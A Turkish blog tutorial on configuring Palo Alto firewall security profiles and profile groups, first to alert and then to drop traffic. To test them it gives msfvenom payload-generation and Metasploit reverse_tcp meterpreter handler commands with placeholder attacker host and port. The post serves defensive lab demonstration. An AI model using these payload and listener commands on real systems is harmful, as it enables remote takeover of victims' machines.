PAN Firewall - Security Profiles Kullanımı


Herkese selamlar,

Bu makalede Paloalto Firewall üzerinde Security Profile Group nasıl kullanılır bunu göreceğiz.

Öncelikle "Objects > Security Profiles > Antivirus >" şeklinde path'e gidilir ve alt kısımında bulunan "Add" butonuna tıklanır, ardından ise name belirtilir örnek olarak “Alert” şeklinde, ardından “Action” ve “WildFire” sekmeleri “alert” şeklinde ayarlanır, eğer .pcap şeklinde  paketleri görüntülenmek isteniyorsa “Packet Capture” butonuna tıklanır, ve son olarak “OK” butonuna tıklanır.
Ardından ise “Anti-Spyware”  sekmesine gir,lir ve  alt kısımdaki "Add" butonuna tıklanır burada bir name belirtmemiz gerekiyor tekrardan "Alert" diyorum ve alt kısımda bulunan "Add" butonun tıklanır burada rule name ve alınacak action belirtilir, biz şimdilik alert alacağımız için "alert’i" seçiyoruz ve “OK” diyoruz.
Şimdi ise "Vulnerability Protection" sekmesinden name belirtilir ve "Add" butonuna tıklanır burada Action kısmından "alert" seçilir ve "OK" butonuna tıklanır.

Ve son olarak "URL Filtering" sekmesinden "Add" butonuna tıklanır ve "Site Access" ve "User Credential Submission" sekmelerinden sağ tık "Set All Actions" sekmesinden "alert" seçilir ve "OK" butonuna tıklanır.

Şimdi ise bir “Security Profile Group” sekmesinden “Add” butonuna tıklanır ve bir name belirtilir, oluşturduğumuz  profilleri bir arada toplamak için ve burada katagorilerde oluşturulan profiller seçilir ve “OK” butonuna tıklanır.

Şimdi ise  “Policies > Security>“ kısmından "Actions" sekmesinde girilir ve "Profile Setting" kısmından oluşturdugumuz “Security Profile Group” seçilir ve "OK" butonuna tıklanır.
Son olarak Sağ üst kısımda bulunan “Commit” butonuna tıklanır ve "Commit" butonuna tıklanarak yapılan işlemler kayıt edilir.
Şimdi ise kali Linux  üzerinden zararlı bir dosya oluşturulur. Öncelikle yeni bir terminal ekranı açılır ve “service apache2 start” şeklinde apache servisi çalıştırılır, ardından ise  “msfvenom –p <PAYLOAD> LHOST=<ATTTACKER_PORT> LPORT=<ATTACKER_PORT>  -f <filetype> -o <kayıt edilecek path ve exe isimi>” şeklinde zararlı dosya oluşturulur.
Son olarak yeni bir terminal ekranı açılır ve “msfconsole -q” şeklinde metasploit çalıştırılır ardından ise “use exploit/multi/handler” dizinine gidilir, şimdi buarada msfvenomda belirttiğimiz payloadı belirtiyoruz “set PAYLOAD Windows/meterpreter/reverse_tcp” şeklinde, son olarak “set LHOST x.x.x.x” şeklinde attacker ip “set LPORT xxxx” şeklinde attacker port, son olarak “exploit” komutu ile dinleme işlemi başlatılır.
Kurban zararlı dosyayı download etti ve çalıştırmakta.
Kurbanın zararlı dosyayı çalıştırması ile birlikte saldırgana gelen bağlantı.
Birde URL üzerinden zararlı bir link oluşturalım, örnek aşağıdaki şeklide;
Şimdi ise PAN üzerinden "Monitor>Threat" sekmesine gidildiğinde loglar gözükmektedir, örnek enes.exe'nin bir metasploit payloadı oldugunu bize göstermekte ve "Action" kısmının “alert” modda oldugu gözükmekte yani herhangi bir güvenlik önlemi yok.
Engelleme;

İlk olarak "Objects > Security Profiles > Antivirus >" şeklinde path'e gidilir ve oluşturulan “Alert” profiline tıklanır, ardından “Action” ve “WildFire” sekmeleri “drop” şeklinde ayarlanır, eğer .pcap şeklinde  paketleri görüntülenmek isteniyorsa “Packet Capture” butonuna tıklanır, burada “drop” seçmemizin amacı gelen giden datayı düşürmek ve son olarak “OK” butonuna tıklanır.
Aynı şeklide "Anti-Spyware" kısmından "Alert" profiline tıklanır ve "Action" kısmı "Drop" olarak seçilir, "OK" butonuna tıklanır.
Aynı şeklide " Vulnerability Protection" kısmından "Alert" profiline tıklanır ve "Action" kısmı "Drop" olarak seçilir, "OK" butonuna tıklanır.
Son olarak “Commit” butonuna tıklanarak kayıt edilir.
Kurban tekrardan aynı dosya erişmek istediğine karşısına “Virus/Spyware Download Blocked” şeklinde bi uyarı ekranı çıkar ve download işlemi engellenmiş olur.
Peki ya dosya önceden download edildiyse? Kurban tekrardan çalıştırmak istediğinde

Saldırgana herhangi bir bağlantı gelmemiştir, çünkü giden gelen bağlantı drop edilmiştir.
Şimdi ise PAN üzerinden loglara bakıldığında göründüğü üzeri “Action” kısmı “drop’dur” ve giden gelen tehditler seviyelerine göre belirlenmiştir ve saldırıyı engelleme başarı ile gerçekleşmiştir.
Güvenli Günler,

Yorumlar

Bu blogdaki popüler yayınlar

Sızma Testi Senaryosu - Bölüm 1

MS17-010 Zafiyetiden Faydalanarak Domain Controller Ele Geçirme

Windows İşletim Sisteminde Yetki Yükseltme - 1